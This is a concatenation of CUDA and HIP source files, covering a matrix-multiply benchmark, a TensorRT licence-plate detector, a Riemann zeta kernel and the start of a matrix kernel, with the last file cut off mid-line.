checkCudaErrors(cudaMalloc(&d_C, sizeof(float)*size*size)); /* copy A and B to GPU */ checkCudaErrors(cudaMemcpy(d_A, A, sizeof(float)*size*size, cudaMemcpyHostToDevice)); checkCudaErrors(cudaMemcpy(d_B, B, sizeof(float)*size*size, cudaMemcpyHostToDevice)); /* host gemm */ if (verify) { cpu_sgemm(C_truth, A, B, size); } /* set C on GPU and run cublas */ checkCudaErrors(cudaMemset(d_C, 0, sizeof(float)*size*size)); //printf("ASDASDASD\n"); cublas_sgemm(d_C, d_A, d_B, size); //printf("NNGNGNGNGNGN"); if (verify) { checkCudaErrors(cudaMemcpy(C_result, d_C, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); } else { checkCudaErrors(cudaMemcpy(C_truth, d_C, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); } /* run naive gpu gemm */ checkCudaErrors(cudaMemset(d_C, 0, sizeof(float)*size*size)); naive_sgemm(d_C, d_A, d_B, size); checkCudaErrors(cudaMemcpy(C_result, d_C, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); /* run shared */ checkCudaErrors(cudaMemset(d_C, 0, sizeof(float)*size*size)); shared_sgemm(d_C, d_A, d_B, size); checkCudaErrors(cudaMemcpy(C_result, d_C, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); /* free */ checkCudaErrors(cudaFree(d_A)); checkCudaErrors(cudaFree(d_B)); checkCudaErrors(cudaFree(d_C)); free(A); free(B); free(C_truth); free(C_result); return 0; }
cb5c290f63dfd4c8cff0d10a7512bbd298f2c9e9.hip
// !!! This is a file automatically generated by hipify!!! #include <chrono> #include <iostream> #include <fstream> #include <memory> #include <cstdlib> #include <vector> #include <algorithm> #include <hip/hip_runtime_api.h> #include <opencv2/opencv.hpp> #include <opencv2/imgproc.hpp> #include <opencv2/highgui.hpp> #include <opencv2/core/cuda.hpp> #include <opencv2/cudawarping.hpp> #include <opencv2/cudaarithm.hpp> #include "NvInfer.h" #include "NvUffParser.h" #include "alpr_api.cc" #include "buffer.cu" using Severity = nvinfer1::ILogger::Severity; class Logger : public nvinfer1::ILogger { void log(Severity severity, const char* msg) override { if((severity == Severity::kERROR) || (severity == Severity::kINTERNAL_ERROR)) std::cout << msg << std::endl; } } gLogger; struct TRTDestroy { template<typename T> void operator()(T* object) const { if(object) object->destroy(); } }; template<typename T> using unique_ptr = std::unique_ptr<T, TRTDestroy>; namespace alpr { class Detection { private: std::shared_ptr<nvinfer1::ICudaEngine> engine; unique_ptr<nvinfer1::IExecutionContext> context; detection::Params params; bool build_engine( unique_ptr<nvinfer1::IBuilder>& builder, unique_ptr<nvinfer1::INetworkDefinition>& network, unique_ptr<nvinfer1::IBuilderConfig>& config, unique_ptr<nvuffparser::IUffParser>& parser ); bool preprocessing(cv::Mat image, BufferManager &buffer, const nvinfer1::Dims& dims); std::vector<alpr::detection::Label> filter_detection(cv::Size size, float* output_buffer, const nvinfer1::Dims& dims, float threshold, const int batch_size); cv::Mat extract_plate(cv::Mat image, cv::Mat points, cv::Size size); public: Detection(detection::Params params); bool build(); bool infer(cv::Mat &image, float threshold, std::pair<detection::Label, cv::Mat>* output); }; }; alpr::Detection::Detection(alpr::detection::Params params) { this->params = params; }; struct InferDeleter { template <typename T> void operator()(T* obj) const { if (obj) { obj->destroy(); } } }; bool alpr::Detection::build(){ { std::vector<char> trtModelStream; size_t size{0}; std::ifstream file("detection.engine", std::ios::binary); if (file.good()) { file.seekg(0, file.end); size = file.tellg(); file.seekg(0, file.beg); trtModelStream.resize(size); file.read(trtModelStream.data(), size); file.close(); } nvinfer1::IRuntime* infer = nvinfer1::createInferRuntime(gLogger); this->engine = std::shared_ptr<nvinfer1::ICudaEngine>( infer->deserializeCudaEngine(trtModelStream.data(), size, nullptr), InferDeleter()); if(this->engine) { this->context = unique_ptr<nvinfer1::IExecutionContext>(this->engine->createExecutionContext()); if(!this->context) { std::cerr << "[Detection] Could not create engine context" << std::endl; return false; } return true; } } auto builder = unique_ptr<nvinfer1::IBuilder>(nvinfer1::createInferBuilder(gLogger)); if(!builder) { std::cerr << "[Detection] Could not create a builder" << std::endl; return false; } auto network = unique_ptr<nvinfer1::INetworkDefinition>(builder->createNetwork()); if(!network) { std::cerr << "[Detection] Could not create a network" << std::endl; return false; } auto config = unique_ptr<nvinfer1::IBuilderConfig>(builder->createBuilderConfig()); if(!config) { std::cerr << "[Detection] Could not create a builder config" << std::endl; return false; } auto parser = unique_ptr<nvuffparser::IUffParser>(nvuffparser::createUffParser()); if(!parser) { std::cerr << "[Detection] Could not create a uff parser" << std::endl; return false; } config->setFlag(nvinfer1::BuilderFlag::kFP16); return this->build_engine(builder, network, config, parser); }; bool alpr::Detection::build_engine( unique_ptr<nvinfer1::IBuilder>& builder, unique_ptr<nvinfer1::INetworkDefinition>& network, unique_ptr<nvinfer1::IBuilderConfig>& config, unique_ptr<nvuffparser::IUffParser>& parser) { parser->registerInput(this->params.input_tensor.c_str(), nvinfer1::DimsCHW(3, 512, 912), nvuffparser::UffInputOrder::kNCHW); parser->registerOutput(this->params.output_tensor.c_str()); auto is_parsed = parser->parse(this->params.path_to_model.c_str(), *network, nvinfer1::DataType::kFLOAT); if(!is_parsed) { std::cerr << "[Detection] Could not parse '" << this->params.path_to_model.c_str() << "' model" << std::endl; return false; } builder->setMaxBatchSize(this->params.batch_size); config->setMaxWorkspaceSize(1 << 30); this->engine = std::shared_ptr<nvinfer1::ICudaEngine>(builder->buildEngineWithConfig(*network, *config), TRTDestroy()); if(!this->engine) { std::cerr << "[Detection] Could not build engine" << std::endl; return false; } std::ofstream __file("detection.engine", std::ios::binary); if(!__file) return false; nvinfer1::IHostMemory* memory = this->engine->serialize(); assert(memory); __file.write(reinterpret_cast<const char*>(memory->data()), memory->size()); memory->destroy(); __file.close(); std::cout << "Engine has restored" << std::endl; this->context = unique_ptr<nvinfer1::IExecutionContext>(this->engine->createExecutionContext()); if(!this->context) { std::cerr << "[Detection] Could not create engine context" << std::endl; return false; } return true; }; bool alpr::Detection::preprocessing(cv::Mat image, BufferManager &buffers, const nvinfer1::Dims& dims) { cv::resize(image, image, cv::Size(dims.d[2], dims.d[1]), cv::INTER_CUBIC); float* buffer = static_cast<float*>(buffers.getHostBuffer(this->params.input_tensor)); for(int i = 0, volume_image = dims.d[0] * dims.d[1] * dims.d[2]; i < this->params.batch_size; ++i) { for (unsigned j = 0, volume_c = dims.d[1] * dims.d[2]; j < volume_c; ++j) { buffer[i * volume_image + 0 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 0]) / 255.0; buffer[i * volume_image + 1 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 1]) / 255.0; buffer[i * volume_image + 2 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 2]) / 255.0; } } return true; } bool alpr::Detection::infer(cv::Mat &image, float threshold, std::pair<alpr::detection::Label, cv::Mat>* output) { BufferManager buffers(this->engine, this->params.batch_size); std::vector<nvinfer1::Dims> input_dims; std::vector<nvinfer1::Dims> output_dims; for (size_t i = 0; i < this->engine->getNbBindings(); ++i) { if(engine->bindingIsInput(i)) input_dims.emplace_back(engine->getBindingDimensions(i)); else output_dims.emplace_back(engine->getBindingDimensions(i)); } if (input_dims.empty() || output_dims.empty()) { std::cerr << "[Detection] Expect at least one input and one output for network" << std::endl; return false; } if(!this->preprocessing(image, buffers, input_dims[0])) { return false; } buffers.copyInputToDevice(); bool status = this->context->enqueue(this->params.batch_size, buffers.getDeviceBindings().data(), 0, nullptr); if(!status) { std::cout << "Model is not infered successfully" << std::endl; } buffers.copyOutputToHost(); float* output_buffer = static_cast<float*>(buffers.getHostBuffer(this->params.output_tensor)); std::vector<alpr::detection::Label> labels = this->filter_detection(cv::Size(input_dims[0].d[2], input_dims[0].d[1]), output_buffer, output_dims[0], threshold, this->params.batch_size); std::vector<alpr::detection::Label> selections = alpr::nms(labels, threshold); if(selections.size() == 0) return false; alpr::detection::Label result = selections.at(0); cv::Size size = image.size(); result.points.row(0) *= size.height; result.points.row(1) *= size.width; output->first = result; output->second = this->extract_plate(image, result.points.clone(), cv::Size(240, 80)); return true; }; std::vector<alpr::detection::Label> alpr::Detection::filter_detection(cv::Size size, float* output_buffer, const nvinfer1::Dims& dims, float threshold, const int batch_size) { float side = 7.75; std::vector<float> cpu_output(output_buffer, output_buffer + alpr::get_size_by_dim(dims) * batch_size); cv::Mat transpose_matrix = (cv::Mat_<float>(3, 4) << -0.5, 0.5, 0.5, -0.5, -0.5, -0.5, 0.5, 0.5, 1.0, 1.0, 1.0, 1.0); std::vector<alpr::detection::Label> labels; size_t index = 0; for(size_t batch = 1; batch <= batch_size; batch++) { for(size_t x = 0; x < dims.d[0]; x++) { for(size_t y = 0; y < dims.d[1]; y++) { float prob = cpu_output.at(index); float data[2][3] = { {cpu_output.at(index + 2), cpu_output.at(index + 3), cpu_output.at(index + 4)}, {cpu_output.at(index + 5), cpu_output.at(index + 6), cpu_output.at(index + 7)} }; index += 8; if(prob <= threshold) continue; cv::Mat affine = cv::Mat(2, 3, CV_32F, data); affine.at<float>(0, 0) = max(affine.at<float>(0, 0), 0.0); affine.at<float>(1, 1) = max(affine.at<float>(1, 1), 0.0); cv::Mat points = affine * transpose_matrix * side; points.row(0) += float(y) + 0.5; points.row(1) += float(x) + 0.5; points.row(0) /= 1.0 * size.height / ::pow(2.0, 4); points.row(1) /= 1.0 * size.width / ::pow(2.0, 4); alpr::detection::Label label(points, prob); labels.push_back(label); } } } std::sort(labels.begin(), labels.end(), [](alpr::detection::Label label_1, alpr::detection::Label label_2) -> bool { return label_1.prob > label_2.prob; }); return labels; }; cv::Mat alpr::Detection::extract_plate(cv::Mat image, cv::Mat points, cv::Size output_size) { cv::Mat matrix; cv::vconcat(points, cv::Mat::ones(1, 4, points.type()), matrix); cv::Mat transpose_matrix = (cv::Mat_<float>(3, 4) << 0.0, output_size.width, output_size.width, 0.0, 0.0, 0.0, output_size.height, output_size.height, 1.0, 1.0, 1.0, 1.0 ); cv::Mat affine = cv::Mat::zeros(8, 9, points.type()); for(size_t i = 0; i < 4; i++) { cv::Mat x = matrix.col(i).t(); cv::Mat transpose = transpose_matrix.col(i); cv::Mat v1 = -1.0 * transpose.at<float>(2) * x; cv::Mat v2 = transpose.at<float>(1) * x; cv::Mat v3 = transpose.at<float>(2) * x; cv::Mat v4 = -1.0 * transpose.at<float>(0) * x; cv::Mat corr_row = (cv::Mat_<float>(1, 9) << 0.0, 0.0, 0.0, v1.at<float>(0), v1.at<float>(1), v1.at<float>(2), v2.at<float>(0), v2.at<float>(1), v2.at<float>(2) ); cv::Mat next_row = (cv::Mat_<float>(1, 9) << v3.at<float>(0), v3.at<float>(1), v3.at<float>(2), 0.0, 0.0, 0.0, v4.at<float>(0), v4.at<float>(1), v4.at<float>(2) ); affine.row(i * 2) += corr_row; affine.row(i * 2 + 1) += next_row; } cv::SVD svd = cv::SVD(affine, 4); cv::Mat transform; svd.vt.row(svd.vt.size().height - 1).reshape(0, 3).assignTo(transform, CV_64F); cv::Mat plate; cv::warpPerspective(image, plate, transform, output_size, 1, 0.0); cv::cvtColor(plate, plate, cv::COLOR_BGR2GRAY); cv::cvtColor(plate, plate, cv::COLOR_GRAY2BGR); return plate; }
cb5c290f63dfd4c8cff0d10a7512bbd298f2c9e9.cu
#include <chrono> #include <iostream> #include <fstream> #include <memory> #include <cstdlib> #include <vector> #include <algorithm> #include <cuda_runtime_api.h> #include <opencv2/opencv.hpp> #include <opencv2/imgproc.hpp> #include <opencv2/highgui.hpp> #include <opencv2/core/cuda.hpp> #include <opencv2/cudawarping.hpp> #include <opencv2/cudaarithm.hpp> #include "NvInfer.h" #include "NvUffParser.h" #include "alpr_api.cc" #include "buffer.cu" using Severity = nvinfer1::ILogger::Severity; class Logger : public nvinfer1::ILogger { void log(Severity severity, const char* msg) override { if((severity == Severity::kERROR) || (severity == Severity::kINTERNAL_ERROR)) std::cout << msg << std::endl; } } gLogger; struct TRTDestroy { template<typename T> void operator()(T* object) const { if(object) object->destroy(); } }; template<typename T> using unique_ptr = std::unique_ptr<T, TRTDestroy>; namespace alpr { class Detection { private: std::shared_ptr<nvinfer1::ICudaEngine> engine; unique_ptr<nvinfer1::IExecutionContext> context; detection::Params params; bool build_engine( unique_ptr<nvinfer1::IBuilder>& builder, unique_ptr<nvinfer1::INetworkDefinition>& network, unique_ptr<nvinfer1::IBuilderConfig>& config, unique_ptr<nvuffparser::IUffParser>& parser ); bool preprocessing(cv::Mat image, BufferManager &buffer, const nvinfer1::Dims& dims); std::vector<alpr::detection::Label> filter_detection(cv::Size size, float* output_buffer, const nvinfer1::Dims& dims, float threshold, const int batch_size); cv::Mat extract_plate(cv::Mat image, cv::Mat points, cv::Size size); public: Detection(detection::Params params); bool build(); bool infer(cv::Mat &image, float threshold, std::pair<detection::Label, cv::Mat>* output); }; }; alpr::Detection::Detection(alpr::detection::Params params) { this->params = params; }; struct InferDeleter { template <typename T> void operator()(T* obj) const { if (obj) { obj->destroy(); } } }; bool alpr::Detection::build(){ { std::vector<char> trtModelStream; size_t size{0}; std::ifstream file("detection.engine", std::ios::binary); if (file.good()) { file.seekg(0, file.end); size = file.tellg(); file.seekg(0, file.beg); trtModelStream.resize(size); file.read(trtModelStream.data(), size); file.close(); } nvinfer1::IRuntime* infer = nvinfer1::createInferRuntime(gLogger); this->engine = std::shared_ptr<nvinfer1::ICudaEngine>( infer->deserializeCudaEngine(trtModelStream.data(), size, nullptr), InferDeleter()); if(this->engine) { this->context = unique_ptr<nvinfer1::IExecutionContext>(this->engine->createExecutionContext()); if(!this->context) { std::cerr << "[Detection] Could not create engine context" << std::endl; return false; } return true; } } auto builder = unique_ptr<nvinfer1::IBuilder>(nvinfer1::createInferBuilder(gLogger)); if(!builder) { std::cerr << "[Detection] Could not create a builder" << std::endl; return false; } auto network = unique_ptr<nvinfer1::INetworkDefinition>(builder->createNetwork()); if(!network) { std::cerr << "[Detection] Could not create a network" << std::endl; return false; } auto config = unique_ptr<nvinfer1::IBuilderConfig>(builder->createBuilderConfig()); if(!config) { std::cerr << "[Detection] Could not create a builder config" << std::endl; return false; } auto parser = unique_ptr<nvuffparser::IUffParser>(nvuffparser::createUffParser()); if(!parser) { std::cerr << "[Detection] Could not create a uff parser" << std::endl; return false; } config->setFlag(nvinfer1::BuilderFlag::kFP16); return this->build_engine(builder, network, config, parser); }; bool alpr::Detection::build_engine( unique_ptr<nvinfer1::IBuilder>& builder, unique_ptr<nvinfer1::INetworkDefinition>& network, unique_ptr<nvinfer1::IBuilderConfig>& config, unique_ptr<nvuffparser::IUffParser>& parser) { parser->registerInput(this->params.input_tensor.c_str(), nvinfer1::DimsCHW(3, 512, 912), nvuffparser::UffInputOrder::kNCHW); parser->registerOutput(this->params.output_tensor.c_str()); auto is_parsed = parser->parse(this->params.path_to_model.c_str(), *network, nvinfer1::DataType::kFLOAT); if(!is_parsed) { std::cerr << "[Detection] Could not parse '" << this->params.path_to_model.c_str() << "' model" << std::endl; return false; } builder->setMaxBatchSize(this->params.batch_size); config->setMaxWorkspaceSize(1 << 30); this->engine = std::shared_ptr<nvinfer1::ICudaEngine>(builder->buildEngineWithConfig(*network, *config), TRTDestroy()); if(!this->engine) { std::cerr << "[Detection] Could not build engine" << std::endl; return false; } std::ofstream __file("detection.engine", std::ios::binary); if(!__file) return false; nvinfer1::IHostMemory* memory = this->engine->serialize(); assert(memory); __file.write(reinterpret_cast<const char*>(memory->data()), memory->size()); memory->destroy(); __file.close(); std::cout << "Engine has restored" << std::endl; this->context = unique_ptr<nvinfer1::IExecutionContext>(this->engine->createExecutionContext()); if(!this->context) { std::cerr << "[Detection] Could not create engine context" << std::endl; return false; } return true; }; bool alpr::Detection::preprocessing(cv::Mat image, BufferManager &buffers, const nvinfer1::Dims& dims) { cv::resize(image, image, cv::Size(dims.d[2], dims.d[1]), cv::INTER_CUBIC); float* buffer = static_cast<float*>(buffers.getHostBuffer(this->params.input_tensor)); for(int i = 0, volume_image = dims.d[0] * dims.d[1] * dims.d[2]; i < this->params.batch_size; ++i) { for (unsigned j = 0, volume_c = dims.d[1] * dims.d[2]; j < volume_c; ++j) { buffer[i * volume_image + 0 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 0]) / 255.0; buffer[i * volume_image + 1 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 1]) / 255.0; buffer[i * volume_image + 2 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 2]) / 255.0; } } return true; } bool alpr::Detection::infer(cv::Mat &image, float threshold, std::pair<alpr::detection::Label, cv::Mat>* output) { BufferManager buffers(this->engine, this->params.batch_size); std::vector<nvinfer1::Dims> input_dims; std::vector<nvinfer1::Dims> output_dims; for (size_t i = 0; i < this->engine->getNbBindings(); ++i) { if(engine->bindingIsInput(i)) input_dims.emplace_back(engine->getBindingDimensions(i)); else output_dims.emplace_back(engine->getBindingDimensions(i)); } if (input_dims.empty() || output_dims.empty()) { std::cerr << "[Detection] Expect at least one input and one output for network" << std::endl; return false; } if(!this->preprocessing(image, buffers, input_dims[0])) { return false; } buffers.copyInputToDevice(); bool status = this->context->enqueue(this->params.batch_size, buffers.getDeviceBindings().data(), 0, nullptr); if(!status) { std::cout << "Model is not infered successfully" << std::endl; } buffers.copyOutputToHost(); float* output_buffer = static_cast<float*>(buffers.getHostBuffer(this->params.output_tensor)); std::vector<alpr::detection::Label> labels = this->filter_detection(cv::Size(input_dims[0].d[2], input_dims[0].d[1]), output_buffer, output_dims[0], threshold, this->params.batch_size); std::vector<alpr::detection::Label> selections = alpr::nms(labels, threshold); if(selections.size() == 0) return false; alpr::detection::Label result = selections.at(0); cv::Size size = image.size(); result.points.row(0) *= size.height; result.points.row(1) *= size.width; output->first = result; output->second = this->extract_plate(image, result.points.clone(), cv::Size(240, 80)); return true; }; std::vector<alpr::detection::Label> alpr::Detection::filter_detection(cv::Size size, float* output_buffer, const nvinfer1::Dims& dims, float threshold, const int batch_size) { float side = 7.75; std::vector<float> cpu_output(output_buffer, output_buffer + alpr::get_size_by_dim(dims) * batch_size); cv::Mat transpose_matrix = (cv::Mat_<float>(3, 4) << -0.5, 0.5, 0.5, -0.5, -0.5, -0.5, 0.5, 0.5, 1.0, 1.0, 1.0, 1.0); std::vector<alpr::detection::Label> labels; size_t index = 0; for(size_t batch = 1; batch <= batch_size; batch++) { for(size_t x = 0; x < dims.d[0]; x++) { for(size_t y = 0; y < dims.d[1]; y++) { float prob = cpu_output.at(index); float data[2][3] = { {cpu_output.at(index + 2), cpu_output.at(index + 3), cpu_output.at(index + 4)}, {cpu_output.at(index + 5), cpu_output.at(index + 6), cpu_output.at(index + 7)} }; index += 8; if(prob <= threshold) continue; cv::Mat affine = cv::Mat(2, 3, CV_32F, data); affine.at<float>(0, 0) = max(affine.at<float>(0, 0), 0.0); affine.at<float>(1, 1) = max(affine.at<float>(1, 1), 0.0); cv::Mat points = affine * transpose_matrix * side; points.row(0) += float(y) + 0.5; points.row(1) += float(x) + 0.5; points.row(0) /= 1.0 * size.height / std::pow(2.0, 4); points.row(1) /= 1.0 * size.width / std::pow(2.0, 4); alpr::detection::Label label(points, prob); labels.push_back(label); } } } std::sort(labels.begin(), labels.end(), [](alpr::detection::Label label_1, alpr::detection::Label label_2) -> bool { return label_1.prob > label_2.prob; }); return labels; }; cv::Mat alpr::Detection::extract_plate(cv::Mat image, cv::Mat points, cv::Size output_size) { cv::Mat matrix; cv::vconcat(points, cv::Mat::ones(1, 4, points.type()), matrix); cv::Mat transpose_matrix = (cv::Mat_<float>(3, 4) << 0.0, output_size.width, output_size.width, 0.0, 0.0, 0.0, output_size.height, output_size.height, 1.0, 1.0, 1.0, 1.0 ); cv::Mat affine = cv::Mat::zeros(8, 9, points.type()); for(size_t i = 0; i < 4; i++) { cv::Mat x = matrix.col(i).t(); cv::Mat transpose = transpose_matrix.col(i); cv::Mat v1 = -1.0 * transpose.at<float>(2) * x; cv::Mat v2 = transpose.at<float>(1) * x; cv::Mat v3 = transpose.at<float>(2) * x; cv::Mat v4 = -1.0 * transpose.at<float>(0) * x; cv::Mat corr_row = (cv::Mat_<float>(1, 9) << 0.0, 0.0, 0.0, v1.at<float>(0), v1.at<float>(1), v1.at<float>(2), v2.at<float>(0), v2.at<float>(1), v2.at<float>(2) ); cv::Mat next_row = (cv::Mat_<float>(1, 9) << v3.at<float>(0), v3.at<float>(1), v3.at<float>(2), 0.0, 0.0, 0.0, v4.at<float>(0), v4.at<float>(1), v4.at<float>(2) ); affine.row(i * 2) += corr_row; affine.row(i * 2 + 1) += next_row; } cv::SVD svd = cv::SVD(affine, 4); cv::Mat transform; svd.vt.row(svd.vt.size().height - 1).reshape(0, 3).assignTo(transform, CV_64F); cv::Mat plate; cv::warpPerspective(image, plate, transform, output_size, 1, 0.0); cv::cvtColor(plate, plate, cv::COLOR_BGR2GRAY); cv::cvtColor(plate, plate, cv::COLOR_GRAY2BGR); return plate; }
42f29fc0be9dff0c54a388f6f56ad2c7a68dd1d8.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include "hip/hip_complex.h" #include <vector> #include "CPUSingleThread.h" #include <math.h> #include <stdio.h> #include "cuda/std/cmath" #include <Windows.h> // Cuda Device function to calculate Complex Exponents __device__ hipDoubleComplex CuCmplxExp(double base, hipDoubleComplex exp) { hipDoubleComplex res; float r, i; sincosf(exp.y * logf(base), &i, &r); // sincosf may show up as error, but compiles with nvcc res.x = pow(base, exp.x) * r; res.y = pow(base, exp.x) * i; return res; } // Equivelant function to calculate Complex Exponents for the host device //__device__ hipDoubleComplex CuCmplxExp(double base, hipDoubleComplex exp) //{ // hipDoubleComplex res; // float r, i; // // sincosf(exp.y * logf(base), &r, &i); // res.x = base * r; // res.y = base * i; // return res; //} __global__ void addKernel(hipDoubleComplex *CudaInput, hipDoubleComplex*CudaOutput, int accuracy, int size, int KernelNum) { int i = blockDim.x * blockIdx.x + threadIdx.x + KernelNum; CudaOutput[i] = make_cuDoubleComplex(0, 0); if (i < size) { for (int c1 = 1; c1 < accuracy; c1++) { if ((c1 % 2) == 0) { CudaOutput[i] = cuCsub(CudaOutput[i], cuCdiv(make_cuDoubleComplex(1, 0), CuCmplxExp((double)c1, CudaInput[i]))); } else { CudaOutput[i] = cuCadd(CudaOutput[i], cuCdiv(make_cuDoubleComplex(1, 0), CuCmplxExp((double)c1, CudaInput[i]))); } } } } //Function to Generate Reiman Values using CUDA std::vector <RiemanPair> GenerateValuesCuda(double ymin, double ymax, double step, double accuracy) { std::vector<hipDoubleComplex> BaseValues; for (double c1 = ymin; c1 < ymax; c1 += step) { BaseValues.emplace_back(make_cuDoubleComplex(0.5, c1)); } int size = BaseValues.size(); hipDoubleComplex* InputValues = new hipDoubleComplex[BaseValues.size()]; hipDoubleComplex* ReturnValues = new hipDoubleComplex[BaseValues.size()]; InputValues = BaseValues.data(); hipDoubleComplex*CudaInput = 0; hipDoubleComplex*CudaOutput = 0; hipError_t cudaStatus; cudaStatus = hipSetDevice(0); cudaStatus = hipMalloc((void**)&CudaInput, BaseValues.size() * sizeof(hipDoubleComplex)); cudaStatus = hipMalloc((void**)&CudaOutput, BaseValues.size() * sizeof(hipDoubleComplex)); cudaStatus = hipMemcpy(CudaInput, InputValues, BaseValues.size() * sizeof(hipDoubleComplex), hipMemcpyHostToDevice); cudaStatus = hipMemcpy(CudaOutput, ReturnValues, BaseValues.size() * sizeof(hipDoubleComplex), hipMemcpyHostToDevice); for (int KernelNumber = 0; KernelNumber <= (ceil((float)BaseValues.size() / (32 * 32))); KernelNumber++) { addKernel << <32, 32 >> > (CudaInput, CudaOutput, accuracy, BaseValues.size(), (32*32)*KernelNumber); cudaStatus = hipGetLastError(); if (hipSuccess != cudaStatus) { fprintf(stderr, "Cuda error: %s.\n", hipGetErrorString(cudaStatus)); exit(EXIT_FAILURE); } } cudaStatus = hipDeviceSynchronize(); cudaStatus = hipMemcpy(ReturnValues, CudaOutput, BaseValues.size() * sizeof(hipDoubleComplex), hipMemcpyDeviceToHost); std::vector<RiemanPair> ReturnData; for (int i = 0; i < BaseValues.size(); i++) { ReturnData.emplace_back( std::complex<double>(InputValues[i].x, InputValues[i].y), std::complex<double>(ReturnValues[i].x, ReturnValues[i].y) ); } hipFree(CudaInput); hipFree(CudaOutput); return ReturnData; }
42f29fc0be9dff0c54a388f6f56ad2c7a68dd1d8.cu
 #include "cuda_runtime.h" #include "device_launch_parameters.h" #include "cuComplex.h" #include <vector> #include "CPUSingleThread.h" #include <math.h> #include <stdio.h> #include "cuda/std/cmath" #include <Windows.h> // Cuda Device function to calculate Complex Exponents __device__ cuDoubleComplex CuCmplxExp(double base, cuDoubleComplex exp) { cuDoubleComplex res; float r, i; sincosf(exp.y * logf(base), &i, &r); // sincosf may show up as error, but compiles with nvcc res.x = pow(base, exp.x) * r; res.y = pow(base, exp.x) * i; return res; } // Equivelant function to calculate Complex Exponents for the host device //__device__ cuDoubleComplex CuCmplxExp(double base, cuDoubleComplex exp) //{ // cuDoubleComplex res; // float r, i; // // sincosf(exp.y * logf(base), &r, &i); // res.x = base * r; // res.y = base * i; // return res; //} __global__ void addKernel(cuDoubleComplex *CudaInput, cuDoubleComplex*CudaOutput, int accuracy, int size, int KernelNum) { int i = blockDim.x * blockIdx.x + threadIdx.x + KernelNum; CudaOutput[i] = make_cuDoubleComplex(0, 0); if (i < size) { for (int c1 = 1; c1 < accuracy; c1++) { if ((c1 % 2) == 0) { CudaOutput[i] = cuCsub(CudaOutput[i], cuCdiv(make_cuDoubleComplex(1, 0), CuCmplxExp((double)c1, CudaInput[i]))); } else { CudaOutput[i] = cuCadd(CudaOutput[i], cuCdiv(make_cuDoubleComplex(1, 0), CuCmplxExp((double)c1, CudaInput[i]))); } } } } //Function to Generate Reiman Values using CUDA std::vector <RiemanPair> GenerateValuesCuda(double ymin, double ymax, double step, double accuracy) { std::vector<cuDoubleComplex> BaseValues; for (double c1 = ymin; c1 < ymax; c1 += step) { BaseValues.emplace_back(make_cuDoubleComplex(0.5, c1)); } int size = BaseValues.size(); cuDoubleComplex* InputValues = new cuDoubleComplex[BaseValues.size()]; cuDoubleComplex* ReturnValues = new cuDoubleComplex[BaseValues.size()]; InputValues = BaseValues.data(); cuDoubleComplex*CudaInput = 0; cuDoubleComplex*CudaOutput = 0; cudaError_t cudaStatus; cudaStatus = cudaSetDevice(0); cudaStatus = cudaMalloc((void**)&CudaInput, BaseValues.size() * sizeof(cuDoubleComplex)); cudaStatus = cudaMalloc((void**)&CudaOutput, BaseValues.size() * sizeof(cuDoubleComplex)); cudaStatus = cudaMemcpy(CudaInput, InputValues, BaseValues.size() * sizeof(cuDoubleComplex), cudaMemcpyHostToDevice); cudaStatus = cudaMemcpy(CudaOutput, ReturnValues, BaseValues.size() * sizeof(cuDoubleComplex), cudaMemcpyHostToDevice); for (int KernelNumber = 0; KernelNumber <= (ceil((float)BaseValues.size() / (32 * 32))); KernelNumber++) { addKernel << <32, 32 >> > (CudaInput, CudaOutput, accuracy, BaseValues.size(), (32*32)*KernelNumber); cudaStatus = cudaGetLastError(); if (cudaSuccess != cudaStatus) { fprintf(stderr, "Cuda error: %s.\n", cudaGetErrorString(cudaStatus)); exit(EXIT_FAILURE); } } cudaStatus = cudaDeviceSynchronize(); cudaStatus = cudaMemcpy(ReturnValues, CudaOutput, BaseValues.size() * sizeof(cuDoubleComplex), cudaMemcpyDeviceToHost); std::vector<RiemanPair> ReturnData; for (int i = 0; i < BaseValues.size(); i++) { ReturnData.emplace_back( std::complex<double>(InputValues[i].x, InputValues[i].y), std::complex<double>(ReturnValues[i].x, ReturnValues[i].y) ); } cudaFree(CudaInput); cudaFree(CudaOutput); return ReturnData; }
9ed9b8df89bbf3d24d6338b2017c5430787aadb3.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <stdlib.h> #include <iostream> #include <string.h> #include <time.h> #include <malloc.h> #include <hip/hip_runtime.h> #include <device_launch_parameters.h> #define FIBER 32 #define MATRIX_SIZE 2048 #define DATA_SIZE MATRIX_SIZE * MATRIX_SIZE * sizeof(int) #define MAX_MATRIX_SIZE (MATRIX_SIZE * MATRIX_SIZE) __global__ void kernel_shared(int *A, int *C, int *B, int *result) { __shared__ int shared_memory[FIBER][FIBER]; int i = blockIdx.x * blockDim.x + threadIdx.y; int j = blockIdx.y * blockDim.y + threadIdx.x; shared_memory[threadIdx.y][threadIdx.x] = B[i * MATRIX_SIZE + j]; __syncthreads(); i = blockIdx.x * blockDim.x + threadIdx.x; j = blockIdx.y * blockDim.y + threadIdx.y; int first_index = i + j * MATRIX_SIZE; int second_index = j + i * MATRIX_SIZE; if (first_index < MAX_MATRIX_SIZE && second_index < MAX_MATRIX_SIZE) { result[first_index] = (A[first_index] + A[first_index]) * shared_memory[threadIdx.x][threadIdx.y] - C[first_index]; } } __global__ void kernel(int *A, int *C, int *B, int *result) { int i = blockIdx.x * blockDim.x + threadIdx.x; int j = blockIdx.y * blockDim.y + threadIdx.y; int first_index = i + j * MATRIX_SIZE; int second_index = j + i * MATRIX_SIZE; if (first_index < MAX_MATRIX_SIZE && second_index < MAX_MATRIX_SIZE) { result[first_index] = (A[first_index] + A[first_index]) * B[second_index] - C[first_index]; } } using namespace std; int* simple_matrix_multiplication(int* A, int* B, int* C) { int *result = (int*)_aligned_malloc(DATA_SIZE, 32); for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { int first_index = i * MATRIX_SIZE + j; int 